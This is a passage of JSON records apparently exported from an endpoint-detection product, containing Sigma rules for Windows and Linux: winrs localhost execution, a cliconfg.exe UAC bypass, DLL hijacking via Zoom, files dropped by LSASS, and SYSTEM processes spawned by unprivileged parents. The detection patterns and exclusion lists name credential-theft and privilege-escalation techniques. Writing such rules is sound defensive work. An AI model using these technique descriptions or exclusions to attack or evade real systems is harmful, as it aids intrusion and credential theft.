"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625861Z",
"creation_date": "2026-03-23T11:45:34.625863Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625868Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/winrs",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_winrs_local.yml",
"content": "title: Suspicious Execution on Localhost via Winrs\nid: 734b213f-25e3-402d-862b-ccbe5a1166f4\ndescription: |\n Detects a suspicious execution of Winrs.exe on a localhost, to possible execute malicious binaries.\n This binary, which is digitally signed by Microsoft, is supposed to be used as a (remote) administrative tool.\n Attackers may abuse it to bypass security restrictions.\n It is recommended to analyze the binary mentioned in the winrs command-line as well as the parent process to look for malicious content or actions.\nreferences:\n - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/winrs\n - https://attack.mitre.org/techniques/T1218/\ndate: 2022/12/04\nmodified: 2025/12/29\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n - OriginalFileName: 'winrs.exe'\n - Image|endswith: '\\winrs.exe'\n\n selection_commandline:\n CommandLine|contains:\n - ' /remote:'\n - ' -remote:'\n - ' /r:'\n - ' -r:'\n\n selection_local:\n CommandLine|contains:\n - '127.0.0.1'\n - 'localhost'\n\n filter_user:\n CommandLine|contains:\n - '-u:localhost'\n - '-username:localhost'\n\n exclusion_inetum:\n CommandLine:\n - 'winrs -r:http://127.0.0.1:5985 *\\inetum\\\\*'\n - 'winrs -r:http://localhost:5985 *\\inetum\\\\*'\n\n exclusion_nexpublica:\n CommandLine|startswith:\n - 'winrs -r:http://127.0.0.1:5985 ?:\\Astre\\exploit\\\\*.cmd'\n - 'winrs -r:http://127.0.0.1:5985 ?:\\app\\exploit\\\\*.cmd'\n GrandparentCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "734b213f-25e3-402d-862b-ccbe5a1166f4",
"rule_name": "Suspicious Execution on Localhost via Winrs",
"rule_description": "Detects a suspicious execution of Winrs.exe on a localhost, to possible execute malicious binaries.\nThis binary, which is digitally signed by Microsoft, is supposed to be used as a (remote) administrative tool.\nAttackers may abuse it to bypass security restrictions.\nIt is recommended to analyze the binary mentioned in the winrs command-line as well as the parent process to look for malicious content or actions.\n",
"rule_creation_date": "2022-12-04",
"rule_modified_date": "2025-12-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "735f553d-5066-4aed-96ae-b618b9999a75",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074456Z",
"creation_date": "2026-03-23T11:45:34.074458Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074463Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.greyhathacker.net/?p=796",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_uac_bypass_cliconfg_ntwdblib.yml",
"content": "title: UAC Bypass Executed via cliconfg.exe\nid: 735f553d-5066-4aed-96ae-b618b9999a75\ndescription: |\n Detects the execution of the cliconfg.exe UAC bypass, involving the hijacking of the ntwdblib.dll DLL.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the process and user session responsible for the creation of the library, as well as the library itself to look for malicious content or actions.\nreferences:\n - https://www.greyhathacker.net/?p=796\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2020/10/15\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1574.001\n - attack.t1548.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.DLLHijacking\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image: '?:\\Windows\\System32\\cliconfg.exe'\n ImageLoaded: '?:\\Windows\\System32\\ntwdblib.dll'\n\n filter_signed:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "735f553d-5066-4aed-96ae-b618b9999a75",
"rule_name": "UAC Bypass Executed via cliconfg.exe",
"rule_description": "Detects the execution of the cliconfg.exe UAC bypass, involving the hijacking of the ntwdblib.dll DLL.\nAdversaries may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the process and user session responsible for the creation of the library, as well as the library itself to look for malicious content or actions.\n",
"rule_creation_date": "2020-10-15",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002",
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7365ba1c-29e1-4a14-8451-769ec6fc0393",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.296893Z",
"creation_date": "2026-03-23T11:45:35.296896Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296902Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1033/",
"https://attack.mitre.org/techniques/T1087/001/"
],
"name": "t1033_lastlog_linux.yml",
"content": "title: Lastlog Execution\nid: 7365ba1c-29e1-4a14-8451-769ec6fc0393\ndescription: |\n Detects the execution of lastlog, a command used to gather the last login times of all users.\n Adversaries may use it during the discovery phase to discover new users and services.\n The information provided by lastlog is read from \"/var/log/lastlog\".\n It is recommended to investigate the execution context as well as surrounding detections to determine if this action was legitimate.\nreferences:\n - https://attack.mitre.org/techniques/T1033/\n - https://attack.mitre.org/techniques/T1087/001/\ndate: 2023/12/15\nmodified: 2026/02/25\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1033\n - attack.t1087.001\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/lastlog'\n CommandLine: 'lastlog'\n # Filter out missing parents\n ParentImage|contains: '?'\n\n exclusion_qualys:\n Ancestors|contains:\n - '/usr/local/qualys/cloud-agent/bin/qualys-scan-util'\n - '/usr/local/qualys/cloud-agent/bin/qualys-cloud-agent'\n\n exclusion_hp:\n ParentImage: '/opt/OV/lbin/eaagt/opcmona'\n\n exclusion_lsagent:\n ParentCommandLine|contains: \"sh -c lastlog | grep -v '*Never logged in'; printf \"\n GrandparentImage: '/usr/sbin/sshd'\n\n exclusion_cockpit:\n - ParentImage: '/usr/bin/cockpit-bridge'\n - GrandparentImage: '/usr/libexec/cockpit-session'\n\n exclusion_sosreport:\n ParentImage: '/usr/bin/timeout'\n GrandparentCommandLine|contains:\n - ' /usr/sbin/sosreport'\n - ' /sbin/sosreport'\n - ' /usr/sbin/sos report'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '|/opt/bmc/bladelogic/RSCD/bin/rscd_full|'\n - '|/opt/bmc/bladelogic/RSCD/sbin/bldeploy|'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7365ba1c-29e1-4a14-8451-769ec6fc0393",
"rule_name": "Lastlog Execution",
"rule_description": "Detects the execution of lastlog, a command used to gather the last login times of all users.\nAdversaries may use it during the discovery phase to discover new users and services.\nThe information provided by lastlog is read from \"/var/log/lastlog\".\nIt is recommended to investigate the execution context as well as surrounding detections to determine if this action was legitimate.\n",
"rule_creation_date": "2023-12-15",
"rule_modified_date": "2026-02-25",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1033",
"attack.t1087.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "736eb5a5-5ffc-4053-ab85-8177f25877ae",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621184Z",
"creation_date": "2026-03-23T11:45:34.621186Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621190Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.compass-security.com/2022/05/bloodhound-inner-workings-part-3/",
"https://car.mitre.org/analytics/CAR-2014-11-005/",
"https://attack.mitre.org/techniques/T1112/"
],
"name": "t1112_remote_registry_enabled.yml",
"content": "title: Remote Registry Service Enabled via Registry\nid: 736eb5a5-5ffc-4053-ab85-8177f25877ae\ndescription: |\n Detects when the Remote Registry Service is enabled via a registry modification.\n This service is disabled by default on workstations (starting with Windows 8) and enabled on servers.\n An adversary can remotely manipulate the registry of another machine if the Remote Registry service is enabled and valid credentials are obtained.\n It can be used by an attacker to prepare a lateral movement technique, discover the configuration of a host, achieve persistence, or anything that aids an adversary in achieving their objective.\n It is recommended to analyze the authentications and network activity around this alert to determine the user and host responsible for this action and to determine whether this action is legitimate.\nreferences:\n - https://blog.compass-security.com/2022/05/bloodhound-inner-workings-part-3/\n - https://car.mitre.org/analytics/CAR-2014-11-005/\n - https://attack.mitre.org/techniques/T1112/\ndate: 2023/09/13\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Lateralization\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\RemoteRegistry\\Start'\n\n filter_disabled:\n Details: 'DWORD (0x00000004)' # SERVICE_DISABLED\n\n # This is handled by the rule 6624dc1b-2cc0-4936-b502-8f6ec161ba8e\n # That other rule makes it possible to identify the real process enabling the service\n filter_service:\n ProcessImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - 
'?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_ccmexec:\n ProcessOriginalFileName: 'CcmExec.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_trendmicro:\n ProcessOriginalFileName: 'housecall.ATTK.exe'\n ProcessSignature: 'Trend Micro, Inc.'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "736eb5a5-5ffc-4053-ab85-8177f25877ae",
"rule_name": "Remote Registry Service Enabled via Registry",
"rule_description": "Detects when the Remote Registry Service is enabled via a registry modification.\nThis service is disabled by default on workstations (starting with Windows 8) and enabled on servers.\nAn adversary can remotely manipulate the registry of another machine if the Remote Registry service is enabled and valid credentials are obtained.\nIt can be used by an attacker to prepare a lateral movement technique, discover the configuration of a host, achieve persistence, or anything that aids an adversary in achieving their objective.\nIt is recommended to analyze the authentications and network activity around this alert to determine the user and host responsible for this action and to determine whether this action is legitimate.\n",
"rule_creation_date": "2023-09-13",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "73880030-9535-4813-a1fb-855b5c356e40",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.596895Z",
"creation_date": "2026-03-23T11:45:34.596898Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.596906Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://twitter.com/an0n_r0/status/1544472352657915904",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_zoom.yml",
"content": "title: DLL Hijacking via Zoom.exe\nid: 73880030-9535-4813-a1fb-855b5c356e40\ndescription: |\n Detects potential Windows DLL Hijacking via Zoom.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://twitter.com/an0n_r0/status/1544472352657915904\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'Zoom'\n ProcessSignature: 'Zoom Video Communications, Inc.'\n ImageLoaded|endswith: '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Users\\\\*\\AppData\\Roaming\\Zoom\\bin\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "73880030-9535-4813-a1fb-855b5c356e40",
"rule_name": "DLL Hijacking via Zoom.exe",
"rule_description": "Detects potential Windows DLL Hijacking via Zoom.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "73bb710a-a580-407e-bcb8-8d438b2105a2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.628048Z",
"creation_date": "2026-03-23T11:45:34.628050Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628054Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.sentinelone.com/labs/operation-tainted-love-chinese-apts-target-telcos-in-new-attacks/",
"https://github.com/gentilkiwi/mimikatz"
],
"name": "t1003_001_lsass_dropping_file.yml",
"content": "title: File Dropped by LSASS Process\nid: 73bb710a-a580-407e-bcb8-8d438b2105a2\ndescription: |\n Detects when a file is written to disk by the Local Security Authority Subsystem Service (LSASS) process.\n The LSASS process is responsible for authentications in Windows.\n Adversaries may attempt to access credential material stored in the LSASS' process memory.\n A file dropped by the LSASS process could be the result of credential theft.\n It is recommended to investigate processes loaded before LSASS dropped this file as well as to download the dropped file for analysis.\n If this activity is recurrent in your environment and you've determined its legitimacy, it is highly recommended to whitelist the concerned path.\nreferences:\n - https://www.sentinelone.com/labs/operation-tainted-love-chinese-apts-target-telcos-in-new-attacks/\n - https://github.com/gentilkiwi/mimikatz\ndate: 2023/03/28\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Image: '?:\\Windows\\System32\\lsass.exe'\n MinimalStackTrace: '?*' # Enforce stacktrace presence\n\n # This is handled by the rule 02b0f6f4-476e-4b12-8067-6fbac9b0fc30\n filter_unknown:\n MinimalStackTrace|endswith: '|UNKNOWN'\n\n filter_knwon_ssp:\n MinimalStackTrace|contains:\n - '|aadcloudap.dll|'\n - '|CertPolEng.dll'\n - '|cloudAP.dll|'\n - '|cps3_pkcs11_w64.dll|'\n - '|cryptnet.dll|'\n - '|dpapisrv.dll|'\n - '|dsreg.dll|laps.dll|'\n - '|dsrolesrv.dll|'\n - '|efscore.dll|'\n - '|ElPassFilt.dll|'\n - '|esent.dll|'\n - '|idoMinidriverIAS.dll|'\n - '|lsasrv.dll|'\n - '|McAfeeTrueKeyPasswordFilter.dll|'\n - '|ncryptprov.dll|'\n - '|netlogon.dll|'\n - '|passhook.dll|'\n - '|passwdhk.dll|'\n - '|PCPKsp.dll|'\n - '|rpcrt4.dll|'\n - '|scecli.dll|'\n - '|schannel.dll'\n - '|SFAPM.dll|'\n - 
'|SppFilter.dll|'\n - '|vaultsvc.dll|'\n - '|webio.dll|'\n - '|Windows.Security.Authentication.Web.Core.dll|'\n - '|wsauth.dll|'\n\n exclusion_crypt:\n MinimalStackTrace|endswith: '|crypt32.dll'\n\n exclusion_unknown:\n MinimalStackTrace: 'ntdll.dll|*|UNKNOWN|UNKNOWN|UNKNOWN|*|kernel32.dll|ntdll.dll'\n\n exclusion_ntdll:\n MinimalStackTrace: 'ntdll.dll'\n\n exclusion_access_failed:\n MinimalStackTrace|contains: 'ACCESS_FAILED|'\n\n exclusion_dcagent:\n MinimalStackTrace|contains: '|dcagent.dll|'\n Path:\n - '?:\\dcagentlog.txt'\n - '?:\\Program Files\\Fortinet\\FSAE\\dcagentlog.txt'\n\n exclusion_ntfrsapi:\n MinimalStackTrace|contains:\n - '|ntfrsapi.dll|'\n - '|dfsrapi.dll|'\n Path|contains:\n - '\\DfsrApi*.log'\n - '\\DfsrApi*.log.gz'\n\n exclusion_netlogon:\n Path: '?:\\Windows\\System32\\config\\netlogon.ftl'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "73bb710a-a580-407e-bcb8-8d438b2105a2",
"rule_name": "File Dropped by LSASS Process",
"rule_description": "Detects when a file is written to disk by the Local Security Authority Subsystem Service (LSASS) process.\nThe LSASS process is responsible for authentications in Windows.\nAdversaries may attempt to access credential material stored in the LSASS' process memory.\nA file dropped by the LSASS process could be the result of credential theft.\nIt is recommended to investigate processes loaded before LSASS dropped this file as well as to download the dropped file for analysis.\nIf this activity is recurrent in your environment and you've determined its legitimacy, it is highly recommended to whitelist the concerned path.\n",
"rule_creation_date": "2023-03-28",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "73e08a31-0ad6-4cdb-bbba-777eb209030f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.610396Z",
"creation_date": "2026-03-23T11:45:34.610400Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.610407Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment",
"https://attack.mitre.org/techniques/T1068/"
],
"name": "t1068_unprivileged_process_spawning_system_process.yml",
"content": "title: Unprivileged Process Spawning SYSTEM-privileged Process\nid: 73e08a31-0ad6-4cdb-bbba-777eb209030f\ndescription: |\n Detects unprivileged processes spawning privileged processes.\n This can be indicative of Windows kernel or third-party driver exploitation for privilege escalation.\n It is recommended to investigate the process launched with SYSTEM privileges to look for malicious contents.\nreferences:\n - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment\n - https://attack.mitre.org/techniques/T1068/\ndate: 2022/09/07\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1068\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.Exploitation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n IntegrityLevel: 'System'\n User: 'NT AUTHORITY\\SYSTEM'\n ParentIntegrityLevel:\n - 'Low'\n - 'Medium'\n\n exclusion_conhost:\n ProcessCommandLine:\n - '\\\\\\?\\?\\\\?:\\windows\\system32\\conhost.exe 0xffffffff -ForceV1'\n - '\\\\\\?\\?\\\\?:\\Windows\\system32\\conhost.exe 0xffffffff'\n - '\\\\\\?\\?\\\\?:\\WINDOWS\\system32\\conhost.exe 0x4'\n\n exclusion_werfault_1:\n # ?:\\windows\\system32\\WerMgr.exe -datacollectorcreate 11556 1196\n ProcessImage:\n - '?:\\Windows\\System32\\wermgr.exe'\n - '?:\\Windows\\Syswow64\\wermgr.exe'\n ProcessCommandLine|contains: '-datacollectorcreate'\n # werfault.exe /hc /shared Global\\0392bf7f15864fb5906be16f2af3f3b0 /t 10276 /p 9788\n ProcessParentCommandLine|contains|all:\n - '/shared '\n - ' Global'\n ProcessGrandparentImage: '?:\\Windows\\System32\\svchost.exe'\n\n exclusion_werfault_2:\n Image:\n - '?:\\Windows\\System32\\WerFault.exe'\n - '?:\\Windows\\Syswow64\\WerFault.exe'\n CommandLine|contains|all:\n - ' -pss '\n - ' -s '\n - ' -p '\n - ' -ip '\n\n exclusion_siemens:\n # C:\\Program 
Files\\Siemens\\Automation\\AWB_V2\\host\\awb\\server\\dist\\node.exe\n # C:\\Program Files\\Siemens\\Automation\\TIAADMIN\\server\\node.exe\n ProcessImage: '?:\\Program Files\\Siemens\\Automation\\\\*\\node.exe'\n ProcessParentImage: '?:\\Program Files\\Siemens\\Automation\\\\*\\node.exe'\n ProcessGrandparentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_ivanti:\n ProcessImage: '?:\\Program Files (x86)\\Ivanti\\EPM Agent\\CommonMonitor\\collector.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "73e08a31-0ad6-4cdb-bbba-777eb209030f",
"rule_name": "Unprivileged Process Spawning SYSTEM-privileged Process",
"rule_description": "Detects unprivileged processes spawning privileged processes.\nThis can be indicative of Windows kernel or third-party driver exploitation for privilege escalation.\nIt is recommended to investigate the process launched with SYSTEM privileges to look for malicious contents.\n",
"rule_creation_date": "2022-09-07",
"rule_modified_date": "2025-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1068"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7420063d-e8f8-4eb6-bcd4-1fb8c0d6f69d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
